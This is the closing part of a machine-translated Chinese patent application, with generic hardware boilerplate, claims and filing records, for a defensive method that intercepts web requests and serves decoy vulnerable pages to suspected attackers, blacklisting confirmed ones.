As shown in fig. 10, an electronic device 1000 according to an embodiment of the present disclosure includes a processor 1001 that can perform various appropriate actions and processes according to a program stored in a Read Only Memory (ROM) 1002 or a program loaded from a storage section 1008 into a Random Access Memory (RAM) 1003. Processor 1001 may include, for example, a general purpose microprocessor (e.g., a CPU), an instruction set processor and/or associated chipset, and/or a special purpose microprocessor (e.g., an Application Specific Integrated Circuit (ASIC)), among others. The processor 1001 may also include onboard memory for caching purposes. The processor 1001 may include a single processing unit or multiple processing units for performing different actions of a method flow according to embodiments of the present disclosure.
In the RAM 1003, various programs and data necessary for the operation of the electronic device 1000 are stored. The processor 1001, ROM 1002 and RAM 1003 are connected to each other by a bus 1004. The processor 1001 performs the various operations of the method flow according to the embodiments of the present disclosure by executing programs in the ROM 1002 and/or the RAM 1003. Note that the program may also be stored in one or more memories other than the ROM 1002 and the RAM 1003. The processor 1001 may also perform the various operations of the method flow according to embodiments of the present disclosure by executing programs stored in one or more such memories.
According to an embodiment of the present disclosure, the electronic device 1000 may also include an input/output (I/O) interface 1005, which is also connected to the bus 1004. The electronic device 1000 may also include one or more of the following components connected to the I/O interface 1005: an input section 1006 including a keyboard, a mouse and the like; an output section 1007 including a Cathode Ray Tube (CRT), a Liquid Crystal Display (LCD) and the like, and a speaker and the like; a storage section 1008 including a hard disk and the like; and a communication section 1009 including a network interface card such as a LAN card, a modem or the like. The communication section 1009 performs communication processing via a network such as the internet. A drive 1010 is also connected to the I/O interface 1005 as necessary. A removable medium 1011 such as a magnetic disk, an optical disk, a magneto-optical disk, a semiconductor memory or the like is mounted on the drive 1010 as necessary, so that a computer program read from it can be installed into the storage section 1008 as necessary.
The present disclosure also provides a computer-readable storage medium, which may be embodied in the devices/apparatuses/systems described in the above embodiments. Or may exist alone without being assembled into the device/apparatus/system. The computer-readable storage medium carries one or more programs which, when executed, implement a method according to an embodiment of the disclosure.
According to embodiments of the present disclosure, the computer-readable storage medium may be a non-volatile computer-readable storage medium, which may include, for example but not limited to: a portable computer diskette, a hard disk, a Random Access Memory (RAM), a read-only memory (ROM), an erasable programmable read-only memory (EPROM or flash memory), a portable compact disc read-only memory (CD-ROM), an optical storage device, a magnetic storage device, or any suitable combination of the foregoing. In the present disclosure, a computer-readable storage medium may be any tangible medium that can contain or store a program for use by or in connection with an instruction execution system, apparatus or device. For example, according to embodiments of the present disclosure, a computer-readable storage medium may include the ROM 1002 and/or the RAM 1003 described above and/or one or more memories other than the ROM 1002 and the RAM 1003.
Embodiments of the present disclosure also include a computer program product comprising a computer program containing program code for performing the method illustrated in the flow chart. When the computer program product runs in a computer system, the program code is used for causing the computer system to realize the method provided by the embodiment of the disclosure.
The above-described functions defined in the system/apparatus of the embodiments of the present disclosure are performed when the computer program is executed by the processor 1001. The systems, apparatuses, modules, units, etc. described above may be implemented by computer program modules according to embodiments of the present disclosure.
In one embodiment, the computer program may be hosted on a tangible storage medium such as an optical storage device, a magnetic storage device, and the like. In another embodiment, the computer program may also be transmitted in the form of a signal on a network medium, distributed, downloaded and installed via the communication part 1009, and/or installed from the removable medium 1011. The computer program containing program code may be transmitted using any suitable network medium, including but not limited to: wireless, wired, etc., or any suitable combination of the foregoing.
In such an embodiment, the computer program may be downloaded and installed from a network through the communication part 1009 and/or installed from the removable medium 1011. The computer program performs the above-described functions defined in the system of the embodiment of the present disclosure when executed by the processor 1001. The systems, devices, apparatuses, modules, units, etc. described above may be implemented by computer program modules according to embodiments of the present disclosure.
In accordance with embodiments of the present disclosure, program code for executing the computer programs provided by embodiments of the present disclosure may be written in any combination of one or more programming languages; in particular, these computer programs may be implemented using high-level procedural and/or object-oriented programming languages, and/or assembly/machine languages. The programming languages include, but are not limited to, Java, C++, Python, the "C" language, or the like. The program code may execute entirely on the user's computing device, partly on the user's device, partly on a remote computing device, or entirely on the remote computing device or server. In situations involving remote computing devices, the remote computing devices may be connected to the user computing device through any kind of network, including a Local Area Network (LAN) or a Wide Area Network (WAN), or may be connected to external computing devices (e.g., through the internet using an internet service provider).
The flowchart and block diagrams in the figures illustrate the architecture, functionality, and operation of possible implementations of systems, methods and computer program products according to various embodiments of the present disclosure. In this regard, each block in the flowchart or block diagrams may represent a module, segment, or portion of code, which comprises one or more executable instructions for implementing the specified logical function(s). It should also be noted that, in some alternative implementations, the functions noted in the block may occur out of the order noted in the figures. For example, two blocks shown in succession may, in fact, be executed substantially concurrently, or the blocks may sometimes be executed in the reverse order, depending upon the functionality involved. It will also be noted that each block of the block diagrams or flowchart illustration, and combinations of blocks in the block diagrams or flowchart illustration, can be implemented by special purpose hardware-based systems which perform the specified functions or acts, or combinations of special purpose hardware and computer instructions.
Those skilled in the art will appreciate that various combinations and/or combinations of features recited in the various embodiments and/or claims of the present disclosure can be made, even if such combinations or combinations are not expressly recited in the present disclosure. In particular, various combinations and/or combinations of the features recited in the various embodiments of the present disclosure and/or the claims may be made without departing from the spirit and teachings of the present disclosure. All such combinations and/or associations are within the scope of the present disclosure.
The embodiments of the present disclosure have been described above. However, these examples are for illustrative purposes only and are not intended to limit the scope of the present disclosure. Although the embodiments are described separately above, this does not mean that the measures in the embodiments cannot be used advantageously in combination. The scope of the disclosure is defined by the appended claims and equivalents thereof. Various alternatives and modifications can be devised by those skilled in the art without departing from the scope of the disclosure, and these alternatives and modifications are intended to fall within the scope of the disclosure.

Claims (12)

1. An interactive attack validation method, comprising:
intercepting a service access request sent by a user to an application server;
performing attack detection on the service access request, wherein the attack detection is used for detecting the attack behavior of the user;
based on the attack detection result, if the service access request hits a specific behavior rule, returning an attack induction response page in response to the service access request so as to perform N times of interactive attack detection on the user, wherein N is an integer greater than or equal to 1, and the attack induction response page has an attack vulnerability.
2. The method of claim 1, wherein the N interactive attack detections of the user comprises:
executing the following steps in a loop until the loop has run N times or a preset condition is met:
intercepting an attack inducement request sent by the user to the application server, wherein the attack inducement request comprises an access request sent by the user in response to the attack induction response page;
performing the attack detection on the attack inducement request; and
if the attack inducement request hits a specific behavior rule, returning the attack induction response page in response to the attack inducement request.
3. The method of claim 2, wherein the preset condition comprises confirming that the attack inducement request hits an attack behavior rule, or confirming that the attack inducement request misses the attack behavior rule, wherein:
if the attack inducement request hits the attack behavior rule, the IP address of the user is added to a black list library and the loop is ended; or
if it is confirmed that the attack inducement request misses both the attack behavior rule and the specific behavior rule, it is confirmed that no attack behavior exists and the loop is ended.
4. The method of claim 2, wherein prior to each return of the attack inducement response page, the method further comprises:
randomly selecting and determining an attack induction response page of the time from an attack test library, wherein the attack test library comprises M attack induction response pages, and each attack induction response page has different attack vulnerabilities.
5. The method of claim 1, wherein after intercepting a service access request sent by a user to an application server, the method further comprises:
storing the service access request based on the user identification of the user;
if the service access request hits the specific behavior rule, performing the N times of interactive attack detection based on the user identification.
6. The method of any one of claims 1 to 5, wherein if it is determined that the attack behavior is not present, the method further comprises:
sending the service access request to the application server.
7. The method of claim 1 or 2, wherein the attack detection of the service access request or the attack inducement request comprises:
matching the service access request or the attack inducement request using an attack test library, wherein the attack test library comprises attack behavior rules and the specific behavior rules; and/or
performing at least one of the following detection steps:
matching the IP address of the user with at least one white list address in a white list library, wherein the at least one white list address is used for directly releasing the service access request; and
matching the IP address of the user with at least one black list address in a black list library, wherein the at least one black list address is used for directly blocking the service access request.
8. An interactive attack validation device comprising:
the request intercepting module is used for intercepting a service access request sent to the application server by a user;
an attack detection module, configured to perform attack detection on the service access request, where the attack detection is used to detect an attack behavior of the user;
an attack induction module, configured to return an attack induction response page in response to the service access request if, based on the result of the attack detection, the service access request hits a specific behavior rule, so as to perform N times of interactive attack detection on the user, wherein N is an integer greater than or equal to 1, and the attack induction response page has an attack vulnerability.
9. An interactive attack validation system comprising:
the client is used for responding to the operation of the user and sending a service access request to the application server;
a monitoring server, configured to execute the interactive attack confirmation method according to any one of claims 1 to 7, and send the service access request to the application server when confirming that the user does not have an attack behavior;
an application server, configured to receive the service access request sent by the monitoring server.
10. An electronic device, comprising:
one or more processors;
a storage device for storing one or more programs,
wherein the one or more programs, when executed by the one or more processors, cause the one or more processors to perform the method of any of claims 1-7.
11. A computer readable storage medium having stored thereon executable instructions which, when executed by a processor, cause the processor to perform the method according to any one of claims 1 to 7.
12. A computer program product comprising a computer program which, when executed by a processor, implements the method according to any one of claims 1 to 7.
CN202210855954.5A 2022-07-20 2022-07-20 Interactive attack confirmation method, device, system, equipment and medium Pending CN115694866A (en)

Priority Applications (1)

Application Number Priority Date Filing Date Title
CN202210855954.5A CN115694866A (en) 2022-07-20 2022-07-20 Interactive attack confirmation method, device, system, equipment and medium

Applications Claiming Priority (1)

Application Number Priority Date Filing Date Title
CN202210855954.5A CN115694866A (en) 2022-07-20 2022-07-20 Interactive attack confirmation method, device, system, equipment and medium

Publications (1)

Publication Number Publication Date
CN115694866A true CN115694866A (en) 2023-02-03

Family

ID=85061147

Family Applications (1)

Application Number Title Priority Date Filing Date
CN202210855954.5A Pending CN115694866A (en) 2022-07-20 2022-07-20 Interactive attack confirmation method, device, system, equipment and medium

Country Status (1)

Country Link
CN (1) CN115694866A (en)

Cited By (1)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
CN116108438A (en) * 2023-04-10 2023-05-12 中国工商银行股份有限公司 Attack detection method, apparatus, device, medium, and program product

Legal Events

Date Code Title Description
PB01 Publication
SE01 Entry into force of request for substantive examination